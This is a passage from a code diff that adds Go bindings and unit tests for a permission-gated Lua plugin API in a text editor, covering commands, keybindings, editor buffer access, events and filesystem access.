+		t.Errorf("child id: expected a1, got %s", nodes[0].Children[0].ID)
+	}
+	if !nodes[1].Muted {
+		t.Error("expected node b to be muted")
+	}
+}

--- a/internal/plugin/lua_commands_test.go
+++ b/internal/plugin/lua_commands_test.go
@@ -1,0 +1,163 @@
+package plugin
+
+import (
+	"testing"
+)
+
+func TestCommandRegistration(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{Commands: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			commands = {
+				{ id = "test.hello", title = "Test: Hello", handler = function() end },
+				{ id = "test.world", title = "Test: World", handler = function() end },
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(p.Commands) != 2 {
+		t.Fatalf("expected 2 commands, got %d", len(p.Commands))
+	}
+	if p.Commands[0].ID != "test.hello" {
+		t.Errorf("expected id 'test.hello', got %q", p.Commands[0].ID)
+	}
+	if p.Commands[0].Title != "Test: Hello" {
+		t.Errorf("expected title 'Test: Hello', got %q", p.Commands[0].Title)
+	}
+	if p.Commands[1].ID != "test.world" {
+		t.Errorf("expected id 'test.world', got %q", p.Commands[1].ID)
+	}
+}
+
+func TestCommandRegistrationWithoutPermission(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			commands = {
+				{ id = "test.hello", title = "Test: Hello", handler = function() end },
+			},
+		})
+	`)
+	if err == nil {
+		t.Fatal("expected error when commands permission not granted")
+	}
+	if len(p.Commands) != 0 {
+		t.Errorf("expected 0 commands, got %d", len(p.Commands))
+	}
+}
+
+func TestCommandHandlerCallable(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{Commands: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		_G.called = false
+		ttt.register({
+			commands = {
+				{ id = "test.run", title = "Test: Run", handler = function()
+					_G.called = true
+				end },
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(p.Commands) != 1 {
+		t.Fatalf("expected 1 command, got %d", len(p.Commands))
+	}
+
+	if err := p.CallLuaFunc(p.Commands[0].Handler); err != nil {
+		t.Fatalf("error calling handler: %v", err)
+	}
+
+	if p.State.GetGlobal("called").String() != "true" {
+		t.Error("expected handler to set called=true")
+	}
+}
+
+func TestKeybindingRegistration(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{Keybindings: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			keybindings = {
+				{ key = "ctrl+k d", command = "docker.restart" },
+				{ key = "ctrl+k l", command = "docker.logs" },
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(p.PluginKeybindings) != 2 {
+		t.Fatalf("expected 2 keybindings, got %d", len(p.PluginKeybindings))
+	}
+	if p.PluginKeybindings[0].Key != "ctrl+k d" {
+		t.Errorf("expected key 'ctrl+k d', got %q", p.PluginKeybindings[0].Key)
+	}
+	if p.PluginKeybindings[0].Command != "docker.restart" {
+		t.Errorf("expected command 'docker.restart', got %q", p.PluginKeybindings[0].Command)
+	}
+}
+
+func TestKeybindingRegistrationWithoutPermission(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			keybindings = {
+				{ key = "ctrl+k d", command = "test.cmd" },
+			},
+		})
+	`)
+	if err == nil {
+		t.Fatal("expected error when keybindings permission not granted")
+	}
+	if len(p.PluginKeybindings) != 0 {
+		t.Errorf("expected 0 keybindings, got %d", len(p.PluginKeybindings))
+	}
+}
+
+func TestCommandSkipsInvalidEntries(t *testing.T) {
+	p, cleanup := newTestPluginBase(PermissionSet{Commands: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			commands = {
+				{ id = "test.valid", title = "Valid", handler = function() end },
+				{ id = "test.nohandler", title = "No Handler" },
+				{ title = "No ID", handler = function() end },
+				"not a table",
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(p.Commands) != 1 {
+		t.Fatalf("expected 1 valid command, got %d", len(p.Commands))
+	}
+	if p.Commands[0].ID != "test.valid" {
+		t.Errorf("expected 'test.valid', got %q", p.Commands[0].ID)
+	}
+}

--- a/internal/plugin/lua_editor.go
+++ b/internal/plugin/lua_editor.go
@@ -1,0 +1,222 @@
+package plugin
+
+import (
+	lua "github.com/yuin/gopher-lua"
+)
+
+func setupEditorModule(L *lua.LState, p *Plugin) {
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		hasRead := p.Granted.Check("editor.read") == nil
+		hasWrite := p.Granted.Check("editor.write") == nil
+
+		if hasRead {
+			L.SetField(mod, "buffer_text", L.NewFunction(editorBufferText(p)))
+			L.SetField(mod, "buffer_lines", L.NewFunction(editorBufferLines(p)))
+			L.SetField(mod, "current_line", L.NewFunction(editorCurrentLine(p)))
+			L.SetField(mod, "cursor", L.NewFunction(editorCursor(p)))
+			L.SetField(mod, "selection", L.NewFunction(editorSelection(p)))
+			L.SetField(mod, "selection_text", L.NewFunction(editorSelectionText(p)))
+			L.SetField(mod, "file_path", L.NewFunction(editorFilePath(p)))
+			L.SetField(mod, "file_name", L.NewFunction(editorFileName(p)))
+			L.SetField(mod, "language", L.NewFunction(editorLanguage(p)))
+		}
+
+		if hasWrite {
+			L.SetField(mod, "insert", L.NewFunction(editorInsert(p)))
+			L.SetField(mod, "replace", L.NewFunction(editorReplace(p)))
+			L.SetField(mod, "set_cursor", L.NewFunction(editorSetCursor(p)))
+			L.SetField(mod, "set_selection", L.NewFunction(editorSetSelection(p)))
+			L.SetField(mod, "clear_selection", L.NewFunction(editorClearSelection(p)))
+		}
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt.editor", loader)
+}
+
+func editorBufferText(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.BufferText()))
+		return 1
+	}
+}
+
+func editorBufferLines(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(L.NewTable())
+			return 1
+		}
+		lines := p.Editor.BufferLines()
+		tbl := L.NewTable()
+		for _, line := range lines {
+			tbl.Append(lua.LString(line))
+		}
+		L.Push(tbl)
+		return 1
+	}
+}
+
+func editorCurrentLine(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.CurrentLine()))
+		return 1
+	}
+}
+
+func editorCursor(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			tbl := L.NewTable()
+			L.SetField(tbl, "line", lua.LNumber(1))
+			L.SetField(tbl, "col", lua.LNumber(1))
+			L.Push(tbl)
+			return 1
+		}
+		line, col := p.Editor.CursorPos()
+		tbl := L.NewTable()
+		L.SetField(tbl, "line", lua.LNumber(line+1))
+		L.SetField(tbl, "col", lua.LNumber(col+1))
+		L.Push(tbl)
+		return 1
+	}
+}
+
+func editorSelection(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		tbl := L.NewTable()
+		if p.Editor == nil {
+			L.SetField(tbl, "active", lua.LFalse)
+			L.Push(tbl)
+			return 1
+		}
+		active, sl, sc, el, ec := p.Editor.Selection()
+		L.SetField(tbl, "active", lua.LBool(active))
+		L.SetField(tbl, "start_line", lua.LNumber(sl+1))
+		L.SetField(tbl, "start_col", lua.LNumber(sc+1))
+		L.SetField(tbl, "end_line", lua.LNumber(el+1))
+		L.SetField(tbl, "end_col", lua.LNumber(ec+1))
+		L.Push(tbl)
+		return 1
+	}
+}
+
+func editorSelectionText(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.SelectionText()))
+		return 1
+	}
+}
+
+func editorFilePath(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.FilePath()))
+		return 1
+	}
+}
+
+func editorFileName(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.FileName()))
+		return 1
+	}
+}
+
+func editorLanguage(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			L.Push(lua.LString(""))
+			return 1
+		}
+		L.Push(lua.LString(p.Editor.Language()))
+		return 1
+	}
+}
+
+func editorInsert(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			return 0
+		}
+		line := int(L.CheckNumber(1)) - 1
+		col := int(L.CheckNumber(2)) - 1
+		text := L.CheckString(3)
+		p.Editor.Insert(line, col, text)
+		return 0
+	}
+}
+
+func editorReplace(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			return 0
+		}
+		sl := int(L.CheckNumber(1)) - 1
+		sc := int(L.CheckNumber(2)) - 1
+		el := int(L.CheckNumber(3)) - 1
+		ec := int(L.CheckNumber(4)) - 1
+		text := L.CheckString(5)
+		p.Editor.Replace(sl, sc, el, ec, text)
+		return 0
+	}
+}
+
+func editorSetCursor(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			return 0
+		}
+		line := int(L.CheckNumber(1)) - 1
+		col := int(L.CheckNumber(2)) - 1
+		p.Editor.SetCursor(line, col)
+		return 0
+	}
+}
+
+func editorSetSelection(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			return 0
+		}
+		sl := int(L.CheckNumber(1)) - 1
+		sc := int(L.CheckNumber(2)) - 1
+		el := int(L.CheckNumber(3)) - 1
+		ec := int(L.CheckNumber(4)) - 1
+		p.Editor.SetSelection(sl, sc, el, ec)
+		return 0
+	}
+}
+
+func editorClearSelection(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Editor == nil {
+			return 0
+		}
+		p.Editor.ClearSelection()
+		return 0
+	}
+}

--- a/internal/plugin/lua_editor_test.go
+++ b/internal/plugin/lua_editor_test.go
@@ -1,0 +1,293 @@
+package plugin
+
+import (
+	"testing"
+)
+
+type mockEditorAPI struct {
+	bufText    string
+	bufLines   []string
+	curLine    string
+	cursorLine int
+	cursorCol  int
+	selActive  bool
+	selSL      int
+	selSC      int
+	selEL      int
+	selEC      int
+	selText    string
+	filePath   string
+	fileName   string
+	language   string
+
+	insertedLine int
+	insertedCol  int
+	insertedText string
+
+	replaceSL   int
+	replaceSC   int
+	replaceEL   int
+	replaceEC   int
+	replaceText string
+
+	setCursorLine int
+	setCursorCol  int
+
+	setSelSL int
+	setSelSC int
+	setSelEL int
+	setSelEC int
+
+	selCleared bool
+}
+
+func (m *mockEditorAPI) BufferText() string  { return m.bufText }
+func (m *mockEditorAPI) BufferLines() []string {
+	result := make([]string, len(m.bufLines))
+	copy(result, m.bufLines)
+	return result
+}
+func (m *mockEditorAPI) CurrentLine() string { return m.curLine }
+func (m *mockEditorAPI) CursorPos() (int, int) {
+	return m.cursorLine, m.cursorCol
+}
+func (m *mockEditorAPI) Selection() (bool, int, int, int, int) {
+	return m.selActive, m.selSL, m.selSC, m.selEL, m.selEC
+}
+func (m *mockEditorAPI) SelectionText() string { return m.selText }
+func (m *mockEditorAPI) FilePath() string      { return m.filePath }
+func (m *mockEditorAPI) FileName() string      { return m.fileName }
+func (m *mockEditorAPI) Language() string       { return m.language }
+func (m *mockEditorAPI) Insert(line, col int, text string) {
+	m.insertedLine = line
+	m.insertedCol = col
+	m.insertedText = text
+}
+func (m *mockEditorAPI) Replace(sl, sc, el, ec int, text string) {
+	m.replaceSL = sl
+	m.replaceSC = sc
+	m.replaceEL = el
+	m.replaceEC = ec
+	m.replaceText = text
+}
+func (m *mockEditorAPI) SetCursor(line, col int) {
+	m.setCursorLine = line
+	m.setCursorCol = col
+}
+func (m *mockEditorAPI) SetSelection(sl, sc, el, ec int) {
+	m.setSelSL = sl
+	m.setSelSC = sc
+	m.setSelEL = el
+	m.setSelEC = ec
+}
+func (m *mockEditorAPI) ClearSelection() {
+	m.selCleared = true
+}
+
+func setupTestPluginWithEditor(perms PermissionSet, editor *mockEditorAPI) (*Plugin, func()) {
+	p, cleanup := newTestPluginBase(perms)
+	p.Editor = editor
+	return p, cleanup
+}
+
+func TestEditorReadBufferText(t *testing.T) {
+	mock := &mockEditorAPI{bufText: "hello\nworld"}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		_G.result = editor.buffer_text()
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	v := p.State.GetGlobal("result")
+	if v.String() != "hello\nworld" {
+		t.Errorf("expected 'hello\\nworld', got %q", v.String())
+	}
+}
+
+func TestEditorReadBufferLines(t *testing.T) {
+	mock := &mockEditorAPI{bufLines: []string{"line1", "line2", "line3"}}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		local lines = editor.buffer_lines()
+		_G.count = #lines
+		_G.first = lines[1]
+		_G.last = lines[3]
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("count").String() != "3" {
+		t.Errorf("expected 3 lines, got %s", p.State.GetGlobal("count").String())
+	}
+	if p.State.GetGlobal("first").String() != "line1" {
+		t.Errorf("expected 'line1', got %q", p.State.GetGlobal("first").String())
+	}
+}
+
+func TestEditorReadCursor(t *testing.T) {
+	mock := &mockEditorAPI{cursorLine: 5, cursorCol: 10}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		local pos = editor.cursor()
+		_G.line = pos.line
+		_G.col = pos.col
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("line").String() != "6" {
+		t.Errorf("expected line 6 (1-based), got %s", p.State.GetGlobal("line").String())
+	}
+	if p.State.GetGlobal("col").String() != "11" {
+		t.Errorf("expected col 11 (1-based), got %s", p.State.GetGlobal("col").String())
+	}
+}
+
+func TestEditorReadFilePath(t *testing.T) {
+	mock := &mockEditorAPI{filePath: "/tmp/test.go", fileName: "test.go", language: "go"}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		_G.path = editor.file_path()
+		_G.name = editor.file_name()
+		_G.lang = editor.language()
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("path").String() != "/tmp/test.go" {
+		t.Errorf("expected '/tmp/test.go', got %q", p.State.GetGlobal("path").String())
+	}
+	if p.State.GetGlobal("name").String() != "test.go" {
+		t.Errorf("expected 'test.go', got %q", p.State.GetGlobal("name").String())
+	}
+	if p.State.GetGlobal("lang").String() != "go" {
+		t.Errorf("expected 'go', got %q", p.State.GetGlobal("lang").String())
+	}
+}
+
+func TestEditorWriteInsert(t *testing.T) {
+	mock := &mockEditorAPI{}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorWrite: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		editor.insert(3, 5, "hello")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if mock.insertedLine != 2 || mock.insertedCol != 4 {
+		t.Errorf("expected insert at (2,4) (0-based), got (%d,%d)", mock.insertedLine, mock.insertedCol)
+	}
+	if mock.insertedText != "hello" {
+		t.Errorf("expected text 'hello', got %q", mock.insertedText)
+	}
+}
+
+func TestEditorWriteReplace(t *testing.T) {
+	mock := &mockEditorAPI{}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorWrite: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		editor.replace(1, 1, 3, 5, "replaced")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if mock.replaceSL != 0 || mock.replaceSC != 0 || mock.replaceEL != 2 || mock.replaceEC != 4 {
+		t.Errorf("unexpected replace range: (%d,%d)-(%d,%d)", mock.replaceSL, mock.replaceSC, mock.replaceEL, mock.replaceEC)
+	}
+	if mock.replaceText != "replaced" {
+		t.Errorf("expected 'replaced', got %q", mock.replaceText)
+	}
+}
+
+func TestEditorWriteSetCursor(t *testing.T) {
+	mock := &mockEditorAPI{}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorWrite: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		editor.set_cursor(10, 20)
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if mock.setCursorLine != 9 || mock.setCursorCol != 19 {
+		t.Errorf("expected cursor at (9,19), got (%d,%d)", mock.setCursorLine, mock.setCursorCol)
+	}
+}
+
+func TestEditorReadWithoutPermission(t *testing.T) {
+	mock := &mockEditorAPI{bufText: "secret"}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		editor.buffer_text()
+	`)
+	if err == nil {
+		t.Fatal("expected error when editor.read not granted")
+	}
+}
+
+func TestEditorWriteWithoutPermission(t *testing.T) {
+	mock := &mockEditorAPI{}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		editor.insert(1, 1, "hack")
+	`)
+	if err == nil {
+		t.Fatal("expected error when editor.write not granted")
+	}
+}
+
+func TestEditorSelection(t *testing.T) {
+	mock := &mockEditorAPI{
+		selActive: true,
+		selSL:     1, selSC: 2,
+		selEL: 3, selEC: 4,
+		selText: "selected text",
+	}
+	p, cleanup := setupTestPluginWithEditor(PermissionSet{EditorRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local editor = require("ttt.editor")
+		local sel = editor.selection()
+		_G.active = sel.active
+		_G.sl = sel.start_line
+		_G.sc = sel.start_col
+		_G.text = editor.selection_text()
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("active").String() != "true" {
+		t.Error("expected active selection")
+	}
+	if p.State.GetGlobal("text").String() != "selected text" {
+		t.Errorf("expected 'selected text', got %q", p.State.GetGlobal("text").String())
+	}
+}

--- a/internal/plugin/lua_events.go
+++ b/internal/plugin/lua_events.go
@@ -1,0 +1,56 @@
+package plugin
+
+import (
+	"fmt"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+var fileEvents = map[string]bool{
+	"file.open":  true,
+	"file.close": true,
+	"file.save":  true,
+}
+
+var editorEvents = map[string]bool{
+	"editor.change": true,
+	"cursor.change": true,
+}
+
+func setupEventsModule(L *lua.LState, p *Plugin) {
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		L.SetField(mod, "on", L.NewFunction(eventsOn(p)))
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt.events", loader)
+}
+
+func eventsOn(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		eventName := L.CheckString(1)
+		callback := L.CheckFunction(2)
+
+		if fileEvents[eventName] {
+			if err := p.Granted.Check("events.file"); err != nil {
+				L.ArgError(1, err.Error())
+				return 0
+			}
+		} else if editorEvents[eventName] {
+			if err := p.Granted.Check("events.editor"); err != nil {
+				L.ArgError(1, err.Error())
+				return 0
+			}
+		} else {
+			L.ArgError(1, fmt.Sprintf("unknown event: %s", eventName))
+			return 0
+		}
+
+		p.EventListeners[eventName] = append(p.EventListeners[eventName], callback)
+		return 0
+	}
+}

--- a/internal/plugin/lua_events_test.go
+++ b/internal/plugin/lua_events_test.go
@@ -1,0 +1,125 @@
+package plugin
+
+import (
+	"testing"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+func setupTestPluginForEvents(perms PermissionSet) (*Plugin, func()) {
+	return newTestPluginBase(perms)
+}
+
+func TestEventsOnFileOpen(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{EventsFile: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		_G.opened_path = ""
+		events.on("file.open", function(path)
+			_G.opened_path = path
+		end)
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	if len(p.EventListeners["file.open"]) != 1 {
+		t.Fatalf("expected 1 listener, got %d", len(p.EventListeners["file.open"]))
+	}
+
+	p.DispatchEvent("file.open", lua.LString("/tmp/test.go"))
+
+	if p.State.GetGlobal("opened_path").String() != "/tmp/test.go" {
+		t.Errorf("expected '/tmp/test.go', got %q", p.State.GetGlobal("opened_path").String())
+	}
+}
+
+func TestEventsOnEditorChange(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{EventsEditor: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		_G.change_count = 0
+		events.on("editor.change", function()
+			_G.change_count = _G.change_count + 1
+		end)
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	p.DispatchEvent("editor.change")
+	p.DispatchEvent("editor.change")
+
+	if p.State.GetGlobal("change_count").String() != "2" {
+		t.Errorf("expected 2 changes, got %s", p.State.GetGlobal("change_count").String())
+	}
+}
+
+func TestEventsFileWithoutPermission(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		events.on("file.open", function() end)
+	`)
+	if err == nil {
+		t.Fatal("expected error when events.file not granted")
+	}
+}
+
+func TestEventsEditorWithoutPermission(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{EventsFile: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		events.on("editor.change", function() end)
+	`)
+	if err == nil {
+		t.Fatal("expected error when events.editor not granted")
+	}
+}
+
+func TestEventsUnknownEvent(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{EventsFile: true, EventsEditor: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		events.on("unknown.event", function() end)
+	`)
+	if err == nil {
+		t.Fatal("expected error for unknown event")
+	}
+}
+
+func TestEventsMultipleListeners(t *testing.T) {
+	p, cleanup := setupTestPluginForEvents(PermissionSet{EventsFile: true})
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local events = require("ttt.events")
+		_G.log = ""
+		events.on("file.save", function(path)
+			_G.log = _G.log .. "A:" .. path .. ";"
+		end)
+		events.on("file.save", function(path)
+			_G.log = _G.log .. "B:" .. path .. ";"
+		end)
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+
+	p.DispatchEvent("file.save", lua.LString("test.go"))
+
+	expected := "A:test.go;B:test.go;"
+	if p.State.GetGlobal("log").String() != expected {
+		t.Errorf("expected %q, got %q", expected, p.State.GetGlobal("log").String())
+	}
+}

--- a/internal/plugin/lua_fs.go
+++ b/internal/plugin/lua_fs.go
@@ -1,0 +1,103 @@
+package plugin
+
+import (
+	lua "github.com/yuin/gopher-lua"
+)
+
+func setupFsModule(L *lua.LState, p *Plugin) {
+	loader := func(L *lua.LState) int {
+		mod := L.NewTable()
+
+		hasRead := p.Granted.Check("fs.read") == nil
+		hasWrite := p.Granted.Check("fs.write") == nil
+
+		if hasRead {
+			L.SetField(mod, "read", L.NewFunction(fsRead(p)))
+			L.SetField(mod, "exists", L.NewFunction(fsExists(p)))
+			L.SetField(mod, "list", L.NewFunction(fsList(p)))
+		}
+
+		if hasWrite {
+			L.SetField(mod, "write", L.NewFunction(fsWrite(p)))
+		}
+
+		L.Push(mod)
+		return 1
+	}
+
+	L.PreloadModule("ttt.fs", loader)
+}
+
+func fsRead(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Filesystem == nil {
+			L.Push(lua.LNil)
+			L.Push(lua.LString("filesystem API not available"))
+			return 2
+		}
+		path := L.CheckString(1)
+		content, err := p.Filesystem.ReadFile(path)
+		if err != nil {
+			L.Push(lua.LNil)
+			L.Push(lua.LString(err.Error()))
+			return 2
+		}
+		L.Push(lua.LString(content))
+		return 1
+	}
+}
+
+func fsWrite(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Filesystem == nil {
+			L.Push(lua.LString("filesystem API not available"))
+			return 1
+		}
+		path := L.CheckString(1)
+		content := L.CheckString(2)
+		err := p.Filesystem.WriteFile(path, content)
+		if err != nil {
+			L.Push(lua.LString(err.Error()))
+			return 1
+		}
+		return 0
+	}
+}
+
+func fsExists(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Filesystem == nil {
+			L.Push(lua.LFalse)
+			return 1
+		}
+		path := L.CheckString(1)
+		L.Push(lua.LBool(p.Filesystem.FileExists(path)))
+		return 1
+	}
+}
+
+func fsList(p *Plugin) lua.LGFunction {
+	return func(L *lua.LState) int {
+		if p.Filesystem == nil {
+			L.Push(lua.LNil)
+			L.Push(lua.LString("filesystem API not available"))
+			return 2
+		}
+		path := L.CheckString(1)
+		entries, err := p.Filesystem.ListDir(path)
+		if err != nil {
+			L.Push(lua.LNil)
+			L.Push(lua.LString(err.Error()))
+			return 2
+		}
+		tbl := L.NewTable()
+		for _, e := range entries {
+			entry := L.NewTable()
+			L.SetField(entry, "name", lua.LString(e.Name))
+			L.SetField(entry, "is_dir", lua.LBool(e.IsDir))
+			tbl.Append(entry)
+		}
+		L.Push(tbl)
+		return 1
+	}
+}

--- a/internal/plugin/lua_fs_test.go
+++ b/internal/plugin/lua_fs_test.go
@@ -1,0 +1,189 @@
+package plugin
+
+import (
+	"fmt"
+	"testing"
+)
+
+type mockFilesystemAPI struct {
+	files   map[string]string
+	dirs    map[string][]FileEntry
+	written map[string]string
+}
+
+func (m *mockFilesystemAPI) ReadFile(path string) (string, error) {
+	if content, ok := m.files[path]; ok {
+		return content, nil
+	}
+	return "", fmt.Errorf("file not found: %s", path)
+}
+
+func (m *mockFilesystemAPI) WriteFile(path, content string) error {
+	if m.written == nil {
+		m.written = make(map[string]string)
+	}
+	m.written[path] = content
+	return nil
+}
+
+func (m *mockFilesystemAPI) FileExists(path string) bool {
+	_, ok := m.files[path]
+	return ok
+}
+
+func (m *mockFilesystemAPI) ListDir(path string) ([]FileEntry, error) {
+	if entries, ok := m.dirs[path]; ok {
+		return entries, nil
+	}
+	return nil, fmt.Errorf("directory not found: %s", path)
+}
+
+func setupTestPluginWithFs(perms PermissionSet, fs *mockFilesystemAPI) (*Plugin, func()) {
+	p, cleanup := newTestPluginBase(perms)
+	p.Filesystem = fs
+	return p, cleanup
+}
+
+func TestFsRead(t *testing.T) {
+	mock := &mockFilesystemAPI{
+		files: map[string]string{"/tmp/test.txt": "file content"},
+	}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		_G.content = fs.read("/tmp/test.txt")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("content").String() != "file content" {
+		t.Errorf("expected 'file content', got %q", p.State.GetGlobal("content").String())
+	}
+}
+
+func TestFsReadNotFound(t *testing.T) {
+	mock := &mockFilesystemAPI{files: map[string]string{}}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		local content, err = fs.read("/nonexistent")
+		_G.is_nil = (content == nil)
+		_G.has_err = (err ~= nil)
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if p.State.GetGlobal("is_nil").String() != "true" {
+		t.Error("expected nil content for missing file")
+	}
+	if p.State.GetGlobal("has_err").String() != "true" {
+		t.Error("expected error for missing file")
+	}
+}
+
+func TestFsWrite(t *testing.T) {
+	mock := &mockFilesystemAPI{}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsWrite: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		fs.write("/tmp/output.txt", "written data")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
+	if mock.written["/tmp/output.txt"] != "written data" {
+		t.Errorf("expected 'written data', got %q", mock.written["/tmp/output.txt"])
+	}
+}
+
+func TestFsExists(t *testing.T) {
+	mock := &mockFilesystemAPI{
+		files: map[string]string{"/tmp/exists.txt": ""},
+	}
+	p, cleanup := setupTestPluginWithFs(PermissionSet{FsRead: true}, mock)
+	defer cleanup()
+
+	err := p.State.DoString(`
+		local fs = require("ttt.fs")
+		_G.found = fs.exists("/tmp/exists.txt")
+		_G.missing = fs.exists("/tmp/nope.txt")
+	`)
+	if err != nil {
+		t.Fatalf("error: %v", err)
+	}
